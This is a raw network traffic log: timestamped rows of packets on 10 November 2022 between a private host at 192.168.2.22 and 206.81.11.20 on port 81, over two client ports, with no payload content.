Nov 10, 2022 11:43:11.822601080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822617054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822626114 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822633982 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822640896 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822655916 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822674036 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822678089 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822710037 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822720051 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822726965 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822751999 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822766066 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822789907 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822832108 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822945118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822964907 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822982073 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822995901 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.823021889 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.823030949 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.857534885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857587099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857615948 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857644081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857671976 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857700109 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857727051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857754946 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857783079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857810020 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857841015 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857868910 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857892990 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.857897997 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857892990 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.857892990 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.857925892 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857954025 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.857954979 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857984066 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.857985973 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858012915 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858042955 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858051062 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858072996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858100891 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858105898 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858129025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858155012 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858156919 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858186007 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858211994 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858215094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858242989 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858270884 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858292103 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858324051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858350992 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858350992 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858377934 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858403921 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858405113 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858437061 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858464003 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858464956 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858494997 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858517885 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858522892 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858551025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858576059 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858578920 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858607054 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858633041 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858633995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858661890 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858690023 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858690023 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858717918 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858722925 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858747005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858774900 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858784914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858810902 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858829975 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858839989 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858867884 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858900070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.858925104 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858954906 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858982086 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.858994007 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859010935 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859040022 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859066963 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859069109 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859097958 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859124899 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859126091 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859153986 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859181881 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859183073 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859209061 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859236956 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859244108 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859265089 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859293938 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859293938 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859323978 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859352112 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859354019 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859380007 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859407902 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859410048 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859435081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859457970 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859464884 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859493017 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859519958 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859524965 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859549999 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859558105 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859579086 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859581947 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859606981 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859635115 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859646082 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859663010 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859689951 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859692097 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859719038 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859746933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859746933 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859776974 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859805107 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859806061 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859833002 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859858036 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859862089 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859889030 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859916925 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859918118 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859945059 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.859971046 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.859972954 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860002995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860032082 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860035896 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860060930 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860085011 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860089064 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860117912 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860145092 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860150099 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860172987 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860200882 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860202074 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860256910 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860285044 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860290051 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860313892 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860342026 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860342026 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860402107 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860457897 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860486984 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860515118 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860532045 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860542059 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860569954 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860595942 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860599041 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860625029 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860649109 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860656023 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860685110 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860687971 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860713005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860739946 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860748053 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860768080 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860795021 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860810041 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860822916 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860851049 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860878944 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860882998 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860908031 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860934019 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.860934973 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860964060 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860991001 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.860999107 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861020088 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861042976 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861051083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861078978 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861104965 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861107111 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861135006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861162901 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861180067 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861191034 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861217976 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861217022 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861244917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861263990 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861273050 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861301899 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861330986 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861354113 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861357927 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861371994 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861383915 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861387014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861416101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861462116 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861464024 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861500025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861526966 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861536980 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861572981 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861597061 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861608028 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861622095 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861643076 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861654043 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861692905 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861694098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861730099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861731052 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861756086 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861764908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861799002 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861799955 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861814976 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861835003 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861869097 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861876011 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861903906 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861905098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861932039 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861943960 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.861974001 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.861979961 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862006903 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862015963 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862041950 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862052917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862076044 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862119913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862154007 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862154961 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862180948 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862190962 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862222910 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862225056 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862246990 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862260103 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862293959 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862293959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862329960 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862334967 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862360954 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862365007 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862399101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862404108 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862404108 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862435102 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862442970 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862471104 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862478971 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862507105 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862515926 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862536907 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862544060 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862572908 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862581015 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862603903 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862617970 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862638950 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862654924 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862678051 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862689018 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862721920 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862723112 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862752914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862759113 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862787962 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862793922 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862818003 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862829924 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862848997 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.862865925 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.862900972 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863006115 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863050938 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863102913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863127947 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863151073 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863152981 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863183022 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863187075 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863204002 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863208055 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863234997 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863255024 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863261938 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863286018 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863286972 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863286972 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863316059 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863323927 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863349915 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863359928 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863359928 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863377094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863389969 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863405943 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863434076 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863476992 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863497019 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863831997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863861084 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863886118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863930941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863936901 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863949060 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863964081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.863969088 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.863991976 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864011049 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864017963 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864047050 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864047050 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864073038 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864083052 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864083052 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864098072 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864120007 CET	49171	81	192.168.2.22	206.81.11.20
